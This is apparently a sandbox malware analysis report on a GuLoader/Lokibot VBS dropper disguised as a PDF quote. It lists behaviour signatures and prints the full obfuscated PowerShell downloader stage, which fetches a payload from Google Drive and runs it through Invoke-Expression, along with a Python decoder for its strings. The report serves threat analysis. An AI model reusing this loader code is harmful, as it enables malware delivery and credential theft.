Malware Analysis Report

2024-11-30 23:38

Sample ID 240418-xr3dqadd3s
Target Request for Proposal Quote_2414976·pdf.vbs
SHA256 56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0
Tags
guloader lokibot collection downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0

Threat Level: Known bad

The file Request for Proposal Quote_2414976·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection downloader spyware stealer trojan

Lokibot

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

outlook_office_path

outlook_win_path

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-18 19:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-18 19:06

Reported

2024-04-18 19:08

Platform

win7-20240221-en

Max time kernel

147s

Max time network

118s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Proposal Quote_2414976·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1592 set thread context of 2772 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1948 wrote to memory of 1640 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 1640 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 1640 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 2956 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1640 wrote to memory of 2956 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1640 wrote to memory of 2956 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 1640 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1640 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1592 wrote to memory of 2756 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1592 wrote to memory of 2756 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1592 wrote to memory of 2756 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1592 wrote to memory of 2756 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1592 wrote to memory of 2772 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1592 wrote to memory of 2772 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Proposal Quote_2414976·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. 
Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr 
S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso 
MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. 
Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
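The long powershell.exe command line above is the GuLoader PowerShell stage, and its only decoder is the Refrig213 function at the top: it walks each quoted literal from index 7 in steps of 8 and stops before the last character, so every 8-character group of dictionary-word filler carries exactly one payload character in its last position. $Deviascope decodes to iex, which makes Medicinmands a thin wrapper around Invoke-Expression, so each Medicinmands (Refrig213 '...') is a statement the script executes. The Python below is an added example, not tooling from this report: it re-implements the routine and runs it over four literals copied from the command line. $Bundskrabets decodes to exactly the cmd.exe command recorded below, which exists only to expand %appdata%\gennemsgnings.Fas (the file later listed under Files); $Cereals148 decodes to an https://drive.google.com/uc?export=download&id=... URL, matching the drive.google.com traffic in the Network section; and the statement inside the while (!$deacidified) loop is Start-Sleep 4. Decode from the original sample rather than from this page's text: the rendering here wraps the command line across lines and may have dropped characters, and because the scheme is positional a single lost character shifts every group after it.

```python
import re


def refrig213(s: str) -> str:
    """Re-implementation of the sample's Refrig213 decoder.

    The PowerShell original loops from index 7 in steps of 8 and stops before the
    last character, so each decoded character is the 8th of an 8-character group
    and the trailing group contributes nothing."""
    return "".join(s[i] for i in range(7, len(s) - 1, 8))


# The literals contain no single quotes, so a negated character class delimits them.
LITERAL_RE = re.compile(r"Refrig213 '([^']*)'")
# Medicinmands is `.($Deviascope) ($arg)` and $Deviascope decodes to "iex", so a
# literal wrapped this way is a statement handed straight to Invoke-Expression.
EXECUTED_RE = re.compile(r"Medicinmands \(Refrig213 '([^']*)'\)")


def decode_literals(script: str) -> list[str]:
    """Every Refrig213 '...' literal in a script, decoded in order of appearance."""
    return [refrig213(m.group(1)) for m in LITERAL_RE.finditer(script)]


def executed_statements(script: str) -> list[str]:
    """Only the decoded strings the script passes to Invoke-Expression."""
    return [refrig213(m.group(1)) for m in EXECUTED_RE.finditer(script)]


# Constructed excerpt: four statements copied verbatim from the powershell.exe
# command line in this report (the last one sits inside the download retry loop).
SCRIPT_EXCERPT = r"""
$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';
$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';
$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';
Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');
"""


if __name__ == "__main__":
    for decoded in decode_literals(SCRIPT_EXCERPT):
        print(repr(decoded))
    print("executed:", executed_statements(SCRIPT_EXCERPT))
```

Run against the whole script, decode_literals gives the User-Agent header, the WebClient construction, the DownloadFile call and the byte-carving that follows the download, in the order the script builds them; executed_statements is the shorter list worth reading first, because those are the statements that actually run.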

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. 
Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr 
S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso 
MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea 